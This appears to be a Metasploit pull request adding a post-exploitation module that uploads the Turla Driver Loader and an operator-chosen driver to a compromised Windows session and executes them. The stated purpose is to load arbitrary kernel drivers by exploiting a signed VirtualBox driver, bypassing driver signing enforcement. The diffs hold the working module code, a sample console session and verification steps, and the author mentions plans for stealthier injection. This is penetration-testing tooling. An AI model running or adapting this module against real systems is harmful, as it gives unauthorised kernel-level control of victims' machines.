### PR TITLE
Turla Driver Loader wrapper module

### DIFF
--- a/documentation/modules/post/windows/manage/turla.md
+++ b/documentation/modules/post/windows/manage/turla.md
@@ -1,0 +1,33 @@
+## Overview
+This module uses the Turla Driver Loader to inject an arbitrary driver into
+kernel space on a target by way of a vulnerability in a signed Oracle VirtualBox 
+driver.  The tool itself must be obtained and installed by the end user of this
+module.  At present, the tool can be obtained at https://github.com/hfiref0x/TDL
+
+By default, the module expects the tool to be at <Msf::Config.local_directory>/tdl/Furutaka.exe, which typically resolves to ~/.msf4/local/tdl/Furutaka.exe.  The driver to be installed is by default located at <Msf::Config.local_directory>/tdl/driver.sys
+
+## Module Options
+- **SESSION** - This option specifies the remote session to upload and launch the tool on.
+- **DRIVER** - This option specifies the location of the driver file to be installed on the remote system.
+- **TDL** - This option specifies the location of the TDL tool (Furutaka.exe) itself.
+
+### Basic Setup Information
+First, one must obtain the tool itself and copy it to ~/.msf4/local/tdl/ along with the driver they wish to inject.  In lieu of this, the user can specify the location of both the tool and the driver via the aforementioned module options.
+
+The following is an example session using the module to inject a driver into the kernel address space on an active remote session
+
+```
+msf exploit(handler) > use post/windows/manage/turla
+msf post(turla) > set session 1
+session => 1
+msf post(turla) > run
+
+[*] Uploading Turla driver loader ...
+[*] File c:\windows\temp\kcyhguqk.exe being uploaded..
+[*] Uploading driver ....
+[*] File c:\windows\temp\sblhwunk.sys being uploaded..
+[*] Executing TDL ...
+[-] Post interrupted by the console user
+[*] Post module execution completed
+```
+

--- a/documentation/modules/post/windows/manage/turla.md
+++ b/documentation/modules/post/windows/manage/turla.md
@@ -10,6 +10,7 @@ By default, the module expects the tool to be at <Msf::Config.local_directory>/t
 - **SESSION** - This option specifies the remote session to upload and launch the tool on.
 - **DRIVER** - This option specifies the location of the driver file to be installed on the remote system.
 - **TDL** - This option specifies the location of the TDL tool (Furutaka.exe) itself.
+- **REMOTEPATH** - This option specifies a writable directory on the target system in which files will be uploaded.  Default is c:\\windows\\temp\\
 
 ### Basic Setup Information
 First, one must obtain the tool itself and copy it to ~/.msf4/local/tdl/ along with the driver they wish to inject.  In lieu of this, the user can specify the location of both the tool and the driver via the aforementioned module options.

--- a/modules/post/windows/manage/turla.rb
+++ b/modules/post/windows/manage/turla.rb
@@ -31,12 +31,13 @@ class MetasploitModule < Msf::Post
 
     register_options([
       OptString.new('DRIVER', [false,'Driver file to install']),
-      OptPath.new('TDL', [false,'Path to Turla Driver Loader',])
+      OptPath.new('TDL', [false,'Path to Turla Driver Loader',]),
+      OptString.new('REMOTEPATH', [false,'Writable directory on target']),
     ])
 
   end
 
-  def upload_files(file, rfilename, directory="c:\\windows\\temp\\")
+  def upload_files(file, rfilename, directory)
     begin
       print_status("Target #{directory + rfilename} being uploaded..")
       write_file(directory + rfilename, file)
@@ -60,7 +61,14 @@ class MetasploitModule < Msf::Post
     else
       tdl_local = File.open(File.join(Msf::Config.local_directory, "tdl", "Furutaka.exe"))
     end
- 
+    
+    if datastore['REMOTEPATH'].to_s.length > 0
+      print_status("Target directory #{datastore['REMOTEPATH']}")
+      remote_path = datastore['REMOTEPATH']
+    else
+      remote_path = "c:\\windows\\temp\\"
+    end
+
     unless ((is_admin?) && session.platform.include?("windows"))
       fail_with(Failure::None, 'Insufficient privileges or unsupported operating system')
     end
@@ -76,10 +84,10 @@ class MetasploitModule < Msf::Post
     driver_local.close
 
     print_status("Uploading Turla driver loader ...")
-    upload_files(hfile, tdl_rfile)
+    upload_files(hfile, tdl_rfile, remote_path)
 
     print_status("Uploading driver ....")
-    upload_files(hdrv, driver_rfile)
+    upload_files(hdrv, driver_rfile, remote_path)
 
     print_status("Executing TDL ...")
 

--- a/modules/post/windows/manage/turla.rb
+++ b/modules/post/windows/manage/turla.rb
@@ -14,8 +14,8 @@ class MetasploitModule < Msf::Post
       'Description'   => %q{
           This module uses the Turla Driver Loader to inject an arbitrary driver into
           kernel space on a target by way of a vulnerability in a signed Oracle VirtualBox 
-          driver.  The tool itself must be obtained and installed by the end user of this
-          module.
+          driver.  As it contains copyrighted material, the tool itself must be obtained and 
+          installed by the end user of this module.
 
           See https://github.com/hfiref0x/TDL for details.
       },

--- a/modules/post/windows/manage/turla.rb
+++ b/modules/post/windows/manage/turla.rb
@@ -1,0 +1,84 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Post
+
+  include Msf::Post::Windows::Priv
+  include Msf::Post::File
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'          => 'tdl stuff',
+      'Description'   => %q{
+          This does a thing to the stuff with the turla driver loader.
+      },
+      'License'       => MSF_LICENSE,
+      'Author'        =>
+        [
+          'wvw <wut@wut.com>'
+        ],
+      'Platform'      => [ 'win' ],
+      'SessionTypes'  => [ 'meterpreter' ]
+    ))
+
+    register_options([
+      OptString.new('DRIVER', [false,'Driver file to install']),
+      OptPath.new('TDL', [false,'Path to Turla Driver Loader',])
+    ])
+
+  end
+
+  def upload_stuff(file, rfilename, directory="c:\\windows\\temp\\")
+    begin
+      print_status("File #{directory + rfilename} being uploaded..")
+      write_file(directory + rfilename, file)
+    rescue Rex::Post::Meterpreter::RequestError => e
+      fail_with(Failure::Unknown, "Error uploading file #{directory + rfilename}: #{e.class} #{e}")
+    end
+  end
+
+  def run
+
+    if datastore['DRIVER']
+      print_status("Using driver file #{datastore['DRIVER']}")
+      driver_local = File.open(datastore['DRIVER'])
+    else
+      driver_local = File.open(File.join(Msf::Config.local_directory, "tdl", "drv.sys"))
+    end
+
+    if datastore['TDL']
+      print_status("Using TDL executable #{datastore['TDL']}")
+      tdl_local = File.open(datastore['TDL'])
+    else
+      tdl_local = File.open(File.join(Msf::Config.local_directory, "tdl", "Furutaka.exe"))
+    end
+ 
+    unless ((is_admin?) && session.platform.include?("windows"))
+      fail_with(Failure::None, 'Insufficient privileges or unsupported operating system')
+    end
+
+    
+    hfile = tdl_local.read
+    tdl_rfile = Rex::Text.rand_text_alpha_lower(8) + ".exe"
+    tdl_local.close
+
+    
+    hdrv = driver_local.read
+    driver_rfile = Rex::Text.rand_text_alpha_lower(8) + ".sys"
+    driver_local.close
+
+    print_status("Uploading Turla driver loader ...")
+    upload_stuff(hfile, tdl_rfile)
+
+    print_status("Uploading driver ....")
+    upload_stuff(hdrv, driver_rfile)
+
+    print_status("Executing TDL ...")
+
+    # be sure this is /C in release
+    cmd_exec("cmd.exe /C start c:\\windows\\temp\\#{tdl_rfile} c:\\windows\\temp\\#{driver_rfile} & pause", nil, 5)
+  end
+
+end

--- a/modules/post/windows/manage/turla.rb
+++ b/modules/post/windows/manage/turla.rb
@@ -75,7 +75,7 @@ class MetasploitModule < Msf::Post
 
     hfile = tdl_local.read
     tdl_rfile = Rex::Text.rand_text_alpha_lower(8) + ".exe"
-    tdl_local.close 
+    tdl_local.close
     hdrv = driver_local.read
     driver_rfile = Rex::Text.rand_text_alpha_lower(8) + ".sys"
     driver_local.close

--- a/modules/post/windows/manage/turla.rb
+++ b/modules/post/windows/manage/turla.rb
@@ -13,8 +13,8 @@ class MetasploitModule < Msf::Post
       'Name'          => 'Turla Driver Loader',
       'Description'   => %q{
           This module uses the Turla Driver Loader to inject an arbitrary driver into
-          kernel space on a target by way of a vulnerability in a signed Oracle VirtualBox 
-          driver.  As it contains copyrighted material, the tool itself must be obtained and 
+          kernel space on a target by way of a vulnerability in a signed Oracle VirtualBox
+          driver.  As it contains copyrighted material, the tool itself must be obtained and
           installed by the end user of this module.
 
           See https://github.com/hfiref0x/TDL for details.
@@ -61,7 +61,7 @@ class MetasploitModule < Msf::Post
     else
       tdl_local = File.open(File.join(Msf::Config.local_directory, "tdl", "Furutaka.exe"))
     end
-    
+
     if datastore['REMOTEPATH'].to_s.length > 0
       print_status("Target directory #{datastore['REMOTEPATH']}")
       remote_path = datastore['REMOTEPATH']
@@ -73,12 +73,9 @@ class MetasploitModule < Msf::Post
       fail_with(Failure::None, 'Insufficient privileges or unsupported operating system')
     end
 
-    
     hfile = tdl_local.read
     tdl_rfile = Rex::Text.rand_text_alpha_lower(8) + ".exe"
-    tdl_local.close
-
-    
+    tdl_local.close 
     hdrv = driver_local.read
     driver_rfile = Rex::Text.rand_text_alpha_lower(8) + ".sys"
     driver_local.close


### PR DESCRIPTION
This is a simple module that wraps the [Turla Driver Loader](https://github.com/hfiref0x/TDL), which itself allows you to inject a driver into kernel address space while sidestepping driver signing enforcement on 64 bit targets with a few caveats.  There are some other tools that do the same thing; however, I've found TDL to be the least problematic.

Since the tool contains copyrighted code, users will need to obtain a copy of it themselves from the provided link and place it in ~/.msf4/local/tdl/.  In the future, I think it's worth exploring the licensing issues and working to more stealthily inject the tool or a derivative versus simply uploading and running it, but for now, this is a first step towards some other goals I want to see realized. 

## Verification

List the steps needed to make sure this thing works

- [ ] Get a session on your target with administrator privileges
- [ ] Choose the driver you want to install and place it in the correct location, or set the location via module options.  You can use one of the compiled dummy drivers bundled with the Turla release
- [ ] Have Debug View, Windbg, or some other tool running on the target such that you can verify DbgPrint() messages
- [ ] `use post/windows/manage/turla`
- [ ] `set SESSION 1` - or whatever your session number is obviously
- [ ] Configure the other options as needed
- [ ] `run`
- [ ] **Verify** that it uploads and executes the tool
- [ ] **Verify** that you see DbgPrint() messages in your tool of choice on the target
